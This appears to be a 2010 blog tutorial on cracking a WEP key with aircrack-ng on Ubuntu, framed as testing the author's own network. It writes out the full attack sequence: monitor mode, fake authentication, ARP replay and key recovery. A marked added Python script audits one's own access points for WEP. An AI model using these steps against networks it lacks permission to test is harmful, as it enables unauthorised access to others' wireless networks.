Wednesday, March 17, 2010

Use Aircrack-ng to test wireless WEP on Ubuntu

I use Ubuntu 9.10 and an HP dv6000 laptop.
The wireless card is an Intel Corporation PRO/Wireless 3945ABG.
First, install aircrack-ng:
    sudo apt-get install aircrack-ng
Check that your card is compatible with aircrack-ng here.
Mine is already included in kernel 2.6.24, and injection is in kernel 2.6.25 or later.
My kernel is 2.6.31, so I don't need to do anything.

Here is the getting started tutorial.

This is what I did to test my network:
1- Start the wireless interface in monitor mode on the AP channel
    sudo airmon-ng start eth1
The output:
    Found 5 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!

    PID     Name
    988     avahi-daemon
    989     avahi-daemon
    1066    NetworkManager
    1361    wpa_supplicant
    32735   dhclient
    Process with PID 32735 (dhclient) is running on interface eth1

    Interface   Chipset         Driver
    eth1        Intel 3945ABG   iwl3945 - [phy0]
                (monitor mode enabled on mon2)
    mon0        Intel 3945ABG   iwl3945 - [phy0]
    mon1        Intel 3945ABG   iwl3945 - [phy0]

2- Test wireless device packet injection
    sudo aireplay-ng -9 -e network_name mon0

3- Start airodump-ng to capture the IVs
In a new shell:
    sudo airodump-ng -c channel_id --bssid accesspoint_mac -w output mon0

4- Use aireplay-ng to do a fake authentication with the access point
In a new shell:
    sudo aireplay-ng -1 6000 -o 1 -q 10 -e network_name -a accesspoint_mac -h laptop_mac mon0

5- Start aireplay-ng in ARP request replay mode
In a new shell:
    sudo aireplay-ng -3 -b accesspoint_mac -h laptop_mac mon0

Wait until you get some ARP requests (this may take some time).

6- Run aircrack-ng to obtain the WEP key
In a new shell:
    sudo aircrack-ng -b accesspoint_mac output*.cap

After some time (depending on the key) you will get the key.
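
Added example, not part of the original post: the airodump-ng run in step 3 also writes a CSV summary beside the capture file, and this Python script reads that summary and reports which of your own access points still advertise WEP or no encryption, so they can be moved to WPA2. The file layout (column order of `output-01.csv`), the function name `audit_own_aps` and all MAC addresses and network names below are assumptions constructed for the example.

```python
import csv
import io

# Constructed sample in the layout airodump-ng writes to <prefix>-01.csv
# (assumed column order; the values below are made up for this example).
SAMPLE_CSV = """\

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2010-03-17 10:00:01, 2010-03-17 10:05:00,  6,  54, WEP , WEP,    , -40,      120,      900,   0.  0.  0.  0,   7, homenet,
00:11:22:33:44:66, 2010-03-17 10:00:02, 2010-03-17 10:05:00, 11,  54, WPA2, CCMP, PSK, -55,      110,        0,   0.  0.  0.  0,   8, homenet2,
66:77:88:99:AA:BB, 2010-03-17 10:00:03, 2010-03-17 10:05:00,  1,  54, WEP , WEP,    , -70,       80,        0,   0.  0.  0.  0,   5, other,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:DD:EE:FF, 2010-03-17 10:00:05, 2010-03-17 10:05:00, -30,      400, 00:11:22:33:44:55,
"""

WEAK = {"WEP", "OPN"}  # privacy values that need replacing with WPA2 or later


def audit_own_aps(csv_text, owned_bssids):
    """Return [(bssid, essid, privacy)] for owned APs using weak privacy."""
    owned = {b.upper() for b in owned_bssids}
    findings, header = [], None
    for row in csv.reader(io.StringIO(csv_text)):
        cells = [c.strip() for c in row]
        if not any(cells):
            if header:          # blank line after the AP table ends it
                break
            continue
        if cells[0] == "BSSID":
            header = cells
            continue
        if header is None or len(cells) < len(header):
            continue            # skip truncated or malformed rows
        ap = dict(zip(header, cells))
        # airodump-ng may list several values in one cell, e.g. "WPA2 WPA"
        privacy = set(ap["Privacy"].split())
        if ap["BSSID"].upper() in owned and privacy & WEAK:
            findings.append((ap["BSSID"], ap["ESSID"], ap["Privacy"]))
    return findings


if __name__ == "__main__":
    mine = ["00:11:22:33:44:55", "00:11:22:33:44:66"]  # your AP inventory
    for bssid, essid, privacy in audit_own_aps(SAMPLE_CSV, mine):
        print(f"{bssid} ({essid}) still uses {privacy}: move it to WPA2")
```

To run it on a real capture summary, pass the text of the CSV file and the list of BSSIDs from your own inventory instead of `SAMPLE_CSV`.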